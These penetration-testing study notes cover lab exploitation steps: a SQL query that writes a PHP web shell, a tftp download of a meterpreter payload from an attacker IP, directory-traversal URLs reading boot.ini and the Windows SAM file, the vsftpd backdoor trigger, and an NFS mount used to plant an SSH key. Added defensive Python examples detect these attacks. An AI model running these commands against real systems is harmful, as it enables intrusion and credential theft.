Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT ““”””” into outfile “C:\\xampp\\htdocs\\shell.php”

http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 192.168.20.10 3232
GET /../../../../../boot.ini HTTP/1.1

http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam
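The Zervit bug above is a missing path check: the server joins whatever follows `?` onto its document root and opens it. As an added example (not from the book or from Zervit), here is the check a file-serving handler needs before opening a client-supplied path, using a constructed document root `/srv/www/htdocs`. It decodes percent-encoding in a bounded loop (so double-encoded dots are caught), treats backslashes as separators because the target is a Windows host, normalises `..`, and refuses anything that would leave the root instead of silently collapsing it.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed document root for the example; the real Zervit install served
# files relative to its own directory on the XAMPP host.
WEB_ROOT = "/srv/www/htdocs"


def resolve_under_root(requested: str, root: str = WEB_ROOT) -> Optional[str]:
    """Return the absolute path for `requested` if it stays inside `root`, else None.

    Rejecting (rather than normalising away) traversal is deliberate: a request
    that tries to climb out of the root is an attack indicator worth logging.
    """
    decoded = requested
    for _ in range(3):  # bounded: %252e%252e needs two passes, never loop forever
        new = unquote(decoded)
        if new == decoded:
            break
        decoded = new
    if "\x00" in decoded:
        return None  # NUL-byte truncation trick
    # Windows hosts accept '\' as a separator, so normalise it before checking.
    decoded = decoded.replace("\\", "/").lstrip("/")
    rel = posixpath.normpath(decoded) if decoded else "."
    if rel == ".." or rel.startswith("../"):
        return None  # would escape the document root
    root_norm = posixpath.normpath(root)
    return root_norm if rel == "." else posixpath.join(root_norm, rel)


def is_traversal_attempt(requested: str) -> bool:
    """Convenience wrapper for log review: True when the request would escape the root."""
    return resolve_under_root(requested) is None


if __name__ == "__main__":
    # The two query strings from the Zervit URLs above plus a few benign requests.
    for req in (
        "index.html",
        "docs/../index.html",
        "../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml",
        "../../../../../../WINDOWS/repair/sam",
        "..%5c..%5cWINDOWS/repair/sam",
        "%252e%252e/boot.ini",
    ):
        print(f"{'TRAVERSAL' if is_traversal_attempt(req) else 'ok       '}  {req}")
```

The same function doubles as a detector over a web server's access log: feed it the path-plus-query of each request and alert on every `None`.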

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec

(6) Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a :) spawned a backdoor on port 6200
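Because the backdoor fires on the USER command before any password check, the trigger shows up in the FTP log as an ordinary failed login with an odd username. As an added example (not from the book), this scans vsftpd-style log lines for usernames ending in `:)`; the log lines are constructed for the example and the client addresses are made up.

```python
import re
from typing import List, Tuple

# Constructed vsftpd-style log lines for the example (not from a real host).
SAMPLE_LOG = """\
Sat Jul  2 10:15:01 2011 [pid 2201] CONNECT: Client "172.16.85.131"
Sat Jul  2 10:15:03 2011 [pid 2200] [alice] OK LOGIN: Client "172.16.85.131"
Sat Jul  2 10:15:20 2011 [pid 2210] CONNECT: Client "172.16.85.131"
Sat Jul  2 10:15:22 2011 [pid 2209] [letmein:)] FAIL LOGIN: Client "172.16.85.131"
Sat Jul  2 10:16:02 2011 [pid 2215] [bob] FAIL LOGIN: Client "10.0.0.7"
"""

# Matches the "[user] OK|FAIL LOGIN: Client "ip"" shape of vsftpd login records.
_LOGIN_RE = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] \[(?P<user>.*?)\] (?P<result>OK|FAIL) LOGIN: '
    r'Client "(?P<client>[^"]+)"$'
)


def find_backdoor_triggers(lines) -> List[Tuple[str, str]]:
    """Return (client, username) for every login whose username ends in ':)'.

    The login result is ignored on purpose: the backdoor opens on the username
    alone, so a FAIL LOGIN is exactly what a successful trigger looks like.
    """
    hits = []
    for line in lines:
        m = _LOGIN_RE.match(line.rstrip("\n"))
        if m and m.group("user").endswith(":)"):
            hits.append((m.group("client"), m.group("user")))
    return hits


if __name__ == "__main__":
    for client, user in find_backdoor_triggers(SAMPLE_LOG.splitlines()):
        print(f"backdoor trigger from {client}: username {user!r}; check for a listener on 6200")
```

On a hit, the follow-up is a listening-socket check on the host (port 6200 from the note above) and replacing the backdoored build, since the trigger is stateless and any later client can reuse the spawned shell.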

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount -e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs -o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/
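The mount above works because the home directory is exported read-write to any host over AUTH_SYS, where the client simply asserts the uid it wants. As an added example (not from the book), here is a small `/etc/exports` auditor that flags the three conditions that make that possible: exports to every host, `no_root_squash`, and writable exports without Kerberos. The exports file is constructed for the example.

```python
import re
from typing import Dict, List

# Constructed /etc/exports for the example (not from any real host).
SAMPLE_EXPORTS = """\
# path                client(options)
/export/home        *(rw,sync,no_root_squash)
/export/username    172.16.85.0/24(rw,sync)
/srv/iso            10.0.0.0/8(ro,sync,root_squash)
/export/wide        (ro)
"""

# One client spec: "host", "host(opts)" or "(opts)"; a bare "(opts)" means all hosts.
_CLIENT_RE = re.compile(r"^(?P<host>[^(]*)(?:\((?P<opts>[^)]*)\))?$")


def parse_exports(text: str) -> List[Dict]:
    """Split an exports file into {path, host, opts} entries, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]  # no client spec at all = everyone
        for spec in clients:
            m = _CLIENT_RE.match(spec)
            if not m:
                continue
            host = m.group("host") or "*"
            opts = [o.strip() for o in (m.group("opts") or "").split(",") if o.strip()]
            entries.append({"path": path, "host": host, "opts": opts})
    return entries


def audit_exports(text: str) -> List[Dict]:
    """Return entries with at least one issue, in file order."""
    findings = []
    for e in parse_exports(text):
        opts = set(e["opts"])
        issues = []
        if e["host"] == "*":
            issues.append("exported to any host")
        if "no_root_squash" in opts:
            issues.append("no_root_squash: remote root keeps uid 0")
        if "rw" in opts and not any(o.startswith("sec=krb5") for o in opts):
            issues.append("rw over AUTH_SYS: any client-chosen uid can write (e.g. ~/.ssh)")
        if issues:
            findings.append({"path": e["path"], "host": e["host"], "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f['path']} -> {f['host']}")
        for issue in f["issues"]:
            print(f"    {issue}")
```

`root_squash` is the nfs-utils default and only remaps uid 0; it does nothing against the attack in the note, which just needs a uid matching the directory owner. Restricting the host list and moving writable exports to `sec=krb5p` are the fixes that close it.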
